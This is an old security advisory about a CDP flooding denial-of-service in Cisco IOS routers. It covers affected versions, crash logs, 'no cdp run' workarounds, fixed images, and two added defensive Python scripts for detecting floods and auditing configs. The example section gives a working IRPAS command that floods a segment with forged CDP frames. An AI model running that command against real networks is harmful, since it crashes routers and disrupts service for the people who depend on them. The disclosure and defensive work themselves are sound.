copyright 1999/2005 vrl labs. - all rights reserved
CDP Vulnerability in Cisco Routers
posted by: valvoline on 20/10/2001 @ 10.07.22
Summary:
There is a vulnerability in the way Cisco routers handle CDP. By sending a large number of CDP neighbor announcements it is possible to consume all of the router's available memory. That will cause a crash or some other abnormal behavior. This vulnerability is assigned Cisco bug ID CSCdu09909.
In order to trigger this vulnerability an attacker must be on the same segment as the target router. This vulnerability cannot be exploited over the Internet unless an attacker has a helper program already planted on the internal network.


Known vulnerable combinations:
* Cisco 1005 IOS 11.1.*
* Cisco 1603 IOS 11.2, 11.3.11b
* Cisco 2503 IOS 12.0.19
* Cisco 2600 IOS 12.1.?
* Catalyst 2940XL IOS 12.0(5.1)XP

Not vulnerable versions:
* Catalyst 5505 CatOS 4.5(1)

The Cisco Discovery Protocol is a layer two protocol and therefore independent of the layer three protocols configured on the device. A Cisco device sends periodic updates out of its interfaces to make itself known to its neighbors. Since it is a layer two protocol, these packets (frames) are not routed. On Ethernet the updates are sent to the multicast address 01:00:0C:CC:CC:CC.

If a Cisco device receives a CDP frame from another device, it copies its contents into internal data structures that the operator can view using the `show cdp neighbors` command. The information includes the Device ID, capabilities, platform, and the sender's port ID. The CDP frames also include a hold timer value that tells the neighbor when it must discard the information. The maximum value for this timer is 255 seconds (4 minutes, 15 seconds).

The internal data structure seems to use the remote Device ID as its key. When some IOS versions receive two identical but long Device IDs, they mistakenly treat them as non-identical and store both of them as independent records.

When a network segment is flooded with large CDP frames containing a random device ID and coming from a random data link address, different IOS versions react differently. The range of possible reactions includes:
+ Reboot after 3 to 5 frames are received
+ Complete halt of the IOS after some thousands of frames
+ Use of all available memory to store CDP neighbor information until the hold timer expires
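Because a flood consists of many distinct Device IDs arriving from many distinct source MAC addresses on one segment, it can be spotted passively from a capture without touching the router. The following detector is an added example, not code from the advisory, Phenoelit or Cisco: it parses the CDP frame layout described above (Ethernet to 01:00:0C:CC:CC:CC, LLC/SNAP, CDP header, then TLVs, of which type 0x0001 is the Device ID) and alerts when the number of distinct neighbors seen inside a sliding window exceeds what a normal segment has. The sample frames, MAC addresses and names are constructed for the example.

```python
import struct
from collections import deque

CDP_MCAST = bytes.fromhex("01000ccccccc")        # destination MAC used by CDP
SNAP_CDP = bytes.fromhex("aaaa0300000c2000")     # LLC/SNAP header: Cisco OUI, PID 0x2000
TLV_DEVICE_ID = 0x0001

# Constructed sample input (hypothetical MACs and names): four announcements, each from a different source MAC, each with a different Device ID TLV.
SAMPLE_FRAMES = [bytes.fromhex(h) for h in (
    "01000ccccccc0000000000010015aaaa0300000c200002b40000000100097274722d41",
    "01000ccccccc0000000000020015aaaa0300000c200002b40000000100097274722d42",
    "01000ccccccc0000000000030015aaaa0300000c200002b40000000100097274722d43",
    "01000ccccccc0000000000040015aaaa0300000c200002b40000000100097274722d44",
)]

def parse_cdp(frame):
    """Return (src_mac, holdtime, device_id) for a CDP frame, or None if it is not CDP."""
    if len(frame) < 26 or frame[:6] != CDP_MCAST or frame[14:22] != SNAP_CDP:
        return None
    length = struct.unpack("!H", frame[12:14])[0]   # 802.3 length field covers LLC + CDP
    cdp = frame[22:14 + length]
    holdtime, device_id, pos = cdp[1], None, 4      # byte 0 = version, bytes 2-3 = checksum
    while pos + 4 <= len(cdp):
        tlv_type, tlv_len = struct.unpack("!HH", cdp[pos:pos + 4])
        if tlv_len < 4 or pos + tlv_len > len(cdp):
            break                                   # malformed TLV: stop, keep what we have
        if tlv_type == TLV_DEVICE_ID:
            device_id = cdp[pos + 4:pos + tlv_len].decode("ascii", "replace")
        pos += tlv_len
    return frame[6:12].hex(":"), holdtime, device_id

class CdpFloodDetector:
    """Alert when more distinct (src MAC, Device ID) pairs than a segment should have appear inside one sliding window."""
    def __init__(self, window_s=10.0, max_neighbors=3):
        self.window_s, self.max_neighbors = window_s, max_neighbors
        self.seen = deque()                          # (timestamp, (src_mac, device_id))

    def observe(self, ts, frame):
        parsed = parse_cdp(frame)
        if parsed is None:
            return False
        src_mac, _holdtime, device_id = parsed
        while self.seen and ts - self.seen[0][0] > self.window_s:
            self.seen.popleft()
        self.seen.append((ts, (src_mac, device_id)))
        return len({key for _, key in self.seen}) > self.max_neighbors

def run_sample():
    det = CdpFloodDetector()                         # four new neighbors in 3 s: the 4th alerts
    return [det.observe(float(i), frame) for i, frame in enumerate(SAMPLE_FRAMES)]
```

Tune `max_neighbors` to the number of CDP speakers the segment legitimately has; a real capture source (pcap) replaces `SAMPLE_FRAMES`.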

After the memory of the device is completely filled with CDP information, it is unable to perform other operations that need additional memory allocated. This includes accepting dynamic routing updates or new inbound telnet(1) sessions.

If an operator of the device console tries to debug the CDP traffic using the command `debug cdp packets`, all tested devices crashed.

The reaction of the command-line shell once flooding has commenced is interesting, as seen in the example below. It is not known whether this behavior can be used for further exploitation of the device.

Example:
To send CDP messages, use the cdp sender tool from the Phenoelit IRPAS package. The command line to send maximum-sized CDP frames with random data link addresses and device names is:

linuxbox# ./cdp -i eth0 -m0 -n 100000 -l 1480 -r -v

Be careful when running this! All vulnerable Cisco devices in the data link multicast domain will be affected.


Reaction of a Cisco 1603 / IOS 11.2(4):

radio# %SYS-2-MALLOCFAIL: Memory allocation of 1480 bytes failed from 0x81B3BE6, pool Processor, alignment 0 -Process= "CDP Protocol", ipl= 0, pid= 9 -Traceback= 80ABDCC 80ACF46 81B3BEE 81B3B72 81B276A 81B224C
radio# %SYS-2-MALLOCFAIL: Memory allocation of 96 bytes failed from 0x81B26D2, pool Processor, alignment 0 -Process= "CDP Protocol", ipl= 0, pid= 9 -Traceback= 80ABDCC 80ACF46 81B26DA 81B224C
%SYS-2-MALLOCFAIL: Memory allocation of 96 bytes failed from 0x81B26D2, pool Processor, alignment 0 -Process= "CDP Protocol", ipl= 0, pid= 9 -Traceback= 80ABDCC 80ACF46 81B26DA 81B224C
radio#sh ?
% Unrecognized command
radio#show ?
% Unrecognized command
radio#


Reaction after `debug cdp packets`:

%Log packet overrun, potential memory corruption, PC 0x81B2720, format: %s
%Log packet overrun, potential memory corruption, PC 0x81B2720, format: %s
....[lots of these].....
%Log packet overrun, potential memory corruption, PC 0x81B2720, format: %s
%Log packet overrun, potential memory corruption, PC 0x81B2720, format: %s

*** BUS ERROR ***
access address = 0x5f227998
program counter = 0x80ad45a
status register = 0x2700
vbr at time of exception = 0x4000000
special status word = 0x0045
faulted cycle was a longword read

monitor: command "boot" aborted due to exception


System Bootstrap, Version .....
Copyright (c) 1994-1996 by Cisco Systems, Inc.
C1600 processor with 2048 Kbytes of main memory

program load complete, entry point: 0x4018060, size: 0x1da950

Workaround:
The workaround for this vulnerability is to disable CDP. In order to disable CDP for the whole router execute the following global command:

Router# configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)# no cdp run

Alternatively, CDP can be disabled on a particular interface. This can be done using the following commands:

Router# configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)# interface Ethernet0
Router(config-if)# no cdp enable

In this particular case, all customers are advised to disable CDP for the whole router.
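To verify that the workaround has actually been applied across a fleet, the saved configurations can be audited rather than each router being inspected by hand. The following audit is an added example, not code from the advisory or from Cisco; it assumes the IOS defaults the advisory relies on (CDP runs unless `no cdp run` appears globally, and each interface runs CDP unless its stanza contains `no cdp enable`). The sample configuration, hostname and addresses are constructed.

```python
import re

# Constructed sample running-config (hypothetical hostname and interfaces).
SAMPLE_CONFIG = """\
hostname radio
!
interface Ethernet0
 ip address 192.0.2.1 255.255.255.0
 no cdp enable
!
interface Serial0
 ip address 198.51.100.1 255.255.255.252
!
interface Ethernet1
 ip address 203.0.113.1 255.255.255.0
!
"""

def cdp_exposure(config):
    """Return (cdp_globally_enabled, [interfaces that still run CDP]).

    IOS runs CDP by default, so the absence of `no cdp run` means it is on, and
    an interface runs CDP unless its stanza contains `no cdp enable`."""
    lines = [l.rstrip() for l in config.splitlines() if l.strip()]
    global_on = not any(l.strip() == "no cdp run" for l in lines)
    exposed, current, disabled = [], None, False
    for line in lines + ["!"]:                 # trailing "!" flushes the last stanza
        if not line.startswith(" "):           # a top-level command ends the stanza
            if current is not None and not disabled:
                exposed.append(current)
            current, disabled = None, False
            m = re.match(r"interface\s+(\S+)", line)
            if m:
                current = m.group(1)
        elif current is not None and line.strip() == "no cdp enable":
            disabled = True
    return global_on, (exposed if global_on else [])

def report(config):
    """One-line verdict: is the advisory's workaround in place on this device?"""
    global_on, exposed = cdp_exposure(config)
    if not global_on:
        return "CDP disabled globally (no cdp run): workaround applied"
    if not exposed:
        return "CDP disabled on every interface: workaround applied per interface"
    return "CDP still enabled on: " + ", ".join(exposed)
```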

This vulnerability has been fixed in the following interim images:
12.2(3.6)B
12.2(4.1)S
12.2(3.6)PB
12.2(3.6)T
12.1(10.1)
12.2(3.6)

All higher IOS releases should contain this fix.

Please note that interim images are built at regular intervals between maintenance releases and receive less testing. Interims should be selected only if there is no other suitable release that addresses the vulnerability, and interim images should be upgraded to the next available maintenance release as soon as possible. Interim releases are not available via manufacturing, and usually they are not available for customer download from CCO without prior arrangement with the Cisco TAC.


Additional information:
The information has been provided by
FX (fx@phenoelit.de)
Damir Rajnovic (gaus@cisco.com)
